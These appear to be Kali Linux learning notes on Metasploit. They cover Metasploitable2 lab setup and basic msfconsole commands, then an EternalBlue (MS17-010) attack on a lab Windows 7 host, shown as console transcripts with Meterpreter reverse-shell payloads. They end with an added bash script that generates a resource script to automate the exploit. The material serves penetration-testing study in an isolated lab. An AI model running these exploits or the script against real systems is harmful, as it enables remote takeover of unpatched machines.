Kali Learning 3: MSF

Metasploitable2

Metasploitable is an intentionally vulnerable target VM based on Ubuntu.

After downloading it, the VM can be opened directly in the hypervisor.

The default username and password are both msfadmin. Because these credentials (and the VM's services) are publicly known, keep it on a host-only or otherwise isolated network; never bridge it onto a network that others can reach.

# Set the root password
sudo passwd root

# Set a static IP: edit /etc/network/interfaces (needs root)
sudo vi /etc/network/interfaces

# eth0 stanza to put in that file (the xxx placeholders are left as in the original; use your lab addresses)
auto eth0
iface eth0 inet static
address xxx.xxx.xxx.xxx
netmask 255.255.255.0
gateway xxx.xxx.xxx.xxx

# Restart networking so the new address takes effect
sudo /etc/init.d/networking restart

Metasploit Framework

msf uses a PostgreSQL database (for hosts, services, loot and workspaces), so start it in Kali first.

# Start PostgreSQL
systemctl start postgresql

# Start it automatically at boot
systemctl enable postgresql

msfconsole itself does not start PostgreSQL. On Kali, `msfdb init` creates the database and the msf user, and `msfdb run` starts the database and then launches msfconsole. msfconsole still starts without a database, but `db_status` will report no connection and scan results will not be recorded.

  • connect command

    Talks to a host like netcat does. Because it goes through any session routes you have configured (route add through a Meterpreter session), it is typically used to reach internal hosts through an already compromised machine.

    msf6 > connect
    Usage: connect [options]  
    
    Communicate with a host, similar to interacting via netcat, taking advantage of
    any configured session pivoting.
    
    OPTIONS:
    
        -C        Try to use CRLF for EOL sequence.
        -P   Specify source port.
        -S   Specify source address.
        -c   Specify which Comm to use.
        -h        Help banner.
        -i   Send the contents of a file.
        -p   List of proxies to use.
        -s        Connect with SSL.
        -u        Switch to a UDP socket.
        -w   Specify connect timeout.
        -z        Just try to connect, then return.
    
    msf6 > connect xuegod.cn 80
    [*] Connected to xuegod.cn:80 (via: 0.0.0.0:0)
    get /
    HTTP/1.1 400 Bad Request
    Server: nginx/1.6.2
    Date: Thu, 21 Jan 2021 08:05:06 GMT
    Content-Type: text/html
    Content-Length: 172
    Connection: close
    
    400 Bad Request        (HTML title; tags stripped by extraction)
    400 Bad Request        (HTML heading)
    nginx/1.6.2

    The request line `get /` is rejected because HTTP method names are case-sensitive, so nginx answers 400 Bad Request. Send `GET / HTTP/1.1`, a `Host:` header and a blank line instead, and pass `-C` so the line endings are CRLF.
  • show command

    show options lists the module's parameters; the Required column marks the ones that must be set before run. show payloads and show targets list the compatible payloads and the module's targets, and show -h lists the other subcommands.

  • search command

    search name:mysql         match on the module name

    search path:mysql         match on the module path, i.e. modules under a mysql directory

    search platform:mysql     match on the platform the module targets (platform values are OS names such as windows or linux, so for MySQL modules name: or path: is the useful filter)

    search cve:CVE-2017-8464  match on a CVE reference; search -h lists the other keywords (type:, rank:, author: and more)

  • use command

    use <module name>, or use <index> with the number from the last search (index 0 below selects exploit/windows/fileformat/cve_2017_8464_lnk_rce).

    msf6 > search cve:8464
    
    Matching Modules
    ================
    
       #  Name                                              Disclosure Date  Rank       Check  Description
       -  ----                                              ---------------  ----       -----  -----------
       0  exploit/windows/fileformat/cve_2017_8464_lnk_rce  2017-06-13       excellent  No     LNK Code Execution Vulnerability
       1  exploit/windows/local/cve_2017_8464_lnk_lpe       2017-06-13       excellent  Yes    LNK Code Execution Vulnerability
    
    
    Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/local/cve_2017_8464_lnk_lpe                                                                             
    
    msf6 > use 0
    msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) > 
    
    
  • info command

    Prints the module's description, targets, options and references; info <index> also works after a search.

    msf6 > search cve:8464
    
    Matching Modules
    ================
    
       #  Name                                              Disclosure Date  Rank       Check  Description
       -  ----                                              ---------------  ----       -----  -----------
       0  exploit/windows/fileformat/cve_2017_8464_lnk_rce  2017-06-13       excellent  No     LNK Code Execution Vulnerability
       1  exploit/windows/local/cve_2017_8464_lnk_lpe       2017-06-13       excellent  Yes    LNK Code Execution Vulnerability
    
    
    Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/local/cve_2017_8464_lnk_lpe                                                                             
    
    msf6 > info 0
    
           Name: LNK Code Execution Vulnerability
         Module: exploit/windows/fileformat/cve_2017_8464_lnk_rce
       Platform: Windows
           Arch: x86, x64
     Privileged: No
        License: Metasploit Framework License (BSD)
           Rank: Excellent
      Disclosed: 2017-06-13
    
    Provided by:
      Uncredited
      Yorick Koster
      Spencer McIntyre
    
    Module stability:
     crash-service-restarts
    
    Available targets:
      Id  Name
      --  ----
      0   Automatic
      1   Windows x64
      2   Windows x86
    
    Check supported:
      No
    
    Basic options:
      Name      Current Setting        Required  Description
      ----      ---------------        --------  -----------
      DLLNAME   FlashPlayerCPLApp.cpl  no        The DLL file containing the payload
      FILENAME  Flash Player.lnk       no        The LNK file
      PATH                             no        An explicit path to where the files will be hosted
    
    Payload information:
      Space: 2048
    
    Description:
      This module exploits a vulnerability in the handling of Windows 
      Shortcut files (.LNK) that contain a dynamic icon, loaded from a 
      malicious DLL. This vulnerability is a variant of MS15-020 
      (CVE-2015-0096). The created LNK file is similar except an 
      additional SpecialFolderDataBlock is included. The folder ID set in 
      this SpecialFolderDataBlock is set to the Control Panel. This is 
      enough to bypass the CPL whitelist. This bypass can be used to trick 
      Windows into loading an arbitrary DLL file. If no PATH is specified, 
      the module will use drive letters D through Z so the files may be 
      placed in the root path of a drive such as a shared VM folder or USB 
      drive.
    
    References:
      https://cvedetails.com/cve/CVE-2017-8464/
      https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464
      http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt
      https://msdn.microsoft.com/en-us/library/dd871305.aspx
      http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm
      https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
    
    

Using EternalBlue against Windows 7

msf6 > search ms17_010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/ms17_010_psexec

msf6 > use 1
msf6 auxiliary(scanner/smb/smb_ms17_010) > show option
[-] Invalid parameter "option", use "show -h" for more information
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOST=192.168.197.54
[-] Unknown variable
Usage: set [option] [value]

Set the given option to value.  If value is omitted, print the current value.
If both are omitted, print options that are currently set.

If run from a module context, this will set the value in the module's
datastore.  Use -g to operate on the global datastore.

If setting a PAYLOAD, this command can take an index from `show payloads'.

msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOST 192.168.197.54
RHOST => 192.168.197.54
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.197.54:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x86 (32-bit)
[*] 192.168.197.54:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > back
msf6 > search ms17_010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/ms17_010_psexec

msf6 > use 2
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.197.53   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.197.54
RHOST => 192.168.197.54
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.197.53:4444 
[*] 192.168.197.54:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.197.54:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x86 (32-bit)
[*] 192.168.197.54:445    - Scanned 1 of 1 hosts (100% complete)
[-] 192.168.197.54:445 - Exploit aborted due to failure: no-target: This exploit module only supports x64 (64-bit) targets
[*] Exploit completed, but no session was created.

The exploit failed here because the target is 32-bit and the built-in ms17_010_eternalblue module supports only x64 targets (its only target is "Windows 7 and Server 2008 R2 (x64)"). The built-in alternative for an x86 Windows 7 host is exploit/windows/smb/ms17_010_psexec, which the search above lists and which supports both architectures. This post instead installed the external eternalblue_doublepulsar module following https://blog.csdn.net/qq_41617034/article/details/91051614; that module drives the original exploit binaries through Wine, which is why the DLL below is written under /root/.wine. Two details in the transcript above are worth noting: `set RHOST=...` fails because set takes `name value` separated by a space, not `=`, and `set RHOST` is accepted as an alias for the RHOSTS option. When switching to a 32-bit target, the payload must also be 32-bit: the default selected earlier was windows/x64/meterpreter/reverse_tcp, which an x86 host cannot run. Then run the 32-bit exploit:

msf6 exploit(windows/smb/eternalblue_doublepulsar) > run

[*] Started reverse TCP handler on 192.168.197.53:4444 
[*] 192.168.197.54:445 - Generating Eternalblue XML data
[*] 192.168.197.54:445 - Generating Doublepulsar XML data
[*] 192.168.197.54:445 - Generating payload DLL for Doublepulsar
[*] 192.168.197.54:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.197.54:445 - Launching Eternalblue...
[+] 192.168.197.54:445 - Backdoor is already installed
[*] 192.168.197.54:445 - Launching Doublepulsar...
[+] 192.168.197.54:445 - Remote code executed... 3... 2... 1...
[*] Exploit completed, but no session was created.

I ran it several times, but it still failed; I don't know why.
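As an added example (not part of the original post and not Metasploit's own code), the following shell helper applies the lesson of this run to the search / use / show options / set / run sequence shown earlier. It reads the verdict line printed by auxiliary/scanner/smb/smb_ms17_010, picks a module whose targets include the detected architecture (ms17_010_eternalblue for x64, ms17_010_psexec for x86, both listed by the search above), pairs it with a payload of the same architecture, and writes a msfconsole resource script. The scanner line is a constructed copy of the one the scan printed above, the 192.168.197.x addresses are the lab addresses used on this page, and the function names and the ms17_010.rc file name are my own.

```bash
#!/usr/bin/env bash
# Added example: choose the MS17-010 module and payload from the scanner
# verdict instead of guessing, then emit a msfconsole resource script.
# Assumptions: lab addresses 192.168.197.54 (target) and 192.168.197.53
# (attacker) from the page; scanner output format as printed by msf6 above.

# Constructed sample: the line smb_ms17_010 printed for the Win7 target.
SCAN_LINE='[+] 192.168.197.54:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x86 (32-bit)'

# arch_from_scan "<scanner line>": prints x86 or x64; returns 1 when the
# host is not reported vulnerable or the architecture is not in the line.
arch_from_scan() {
  case "$1" in
    *"likely VULNERABLE to MS17-010"*) ;;
    *) return 1 ;;
  esac
  case "$1" in
    *"x64 (64-bit)"*) echo x64 ;;
    *"x86 (32-bit)"*) echo x86 ;;
    *) return 1 ;;
  esac
}

# choose_module <arch>: the built-in module whose targets include <arch>.
# ms17_010_eternalblue only has an x64 target (the failure seen above);
# ms17_010_psexec works on x86 and x64 but needs a reachable named pipe.
choose_module() {
  case "$1" in
    x64) echo exploit/windows/smb/ms17_010_eternalblue ;;
    x86) echo exploit/windows/smb/ms17_010_psexec ;;
    *) return 1 ;;
  esac
}

# choose_payload <arch>: a Meterpreter stager of the same architecture.
# Sending the default windows/x64 payload to an x86 host cannot work.
choose_payload() {
  case "$1" in
    x64) echo windows/x64/meterpreter/reverse_tcp ;;
    x86) echo windows/meterpreter/reverse_tcp ;;
    *) return 1 ;;
  esac
}

# write_rc <rhost> <lhost> <arch> <outfile>: write the resource script.
# "check" re-runs the module's own MS17-010 check; "run -z" does not
# attach to the new session so the script can continue.
write_rc() {
  local rhost="$1" lhost="$2" arch="$3" out="$4"
  local mod pay
  mod=$(choose_module "$arch") || return 1
  pay=$(choose_payload "$arch") || return 1
  cat > "$out" <<EOF
use $mod
set RHOSTS $rhost
set PAYLOAD $pay
set LHOST $lhost
set LPORT 4444
check
run -z
EOF
}

# Stand-alone run: plan from the sample line and write ms17_010.rc.
if arch=$(arch_from_scan "$SCAN_LINE"); then
  write_rc 192.168.197.54 192.168.197.53 "$arch" ms17_010.rc
  echo "wrote ms17_010.rc for $arch using $(choose_module "$arch")"
fi
```

Run the generated script with `msfconsole -q -r ms17_010.rc`. For the x86 path, ms17_010_psexec must be able to open a named pipe on the target; rerunning the scanner with `set CHECK_PIPE true` (the option shown in its show options output above) tells you in advance whether one is available.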
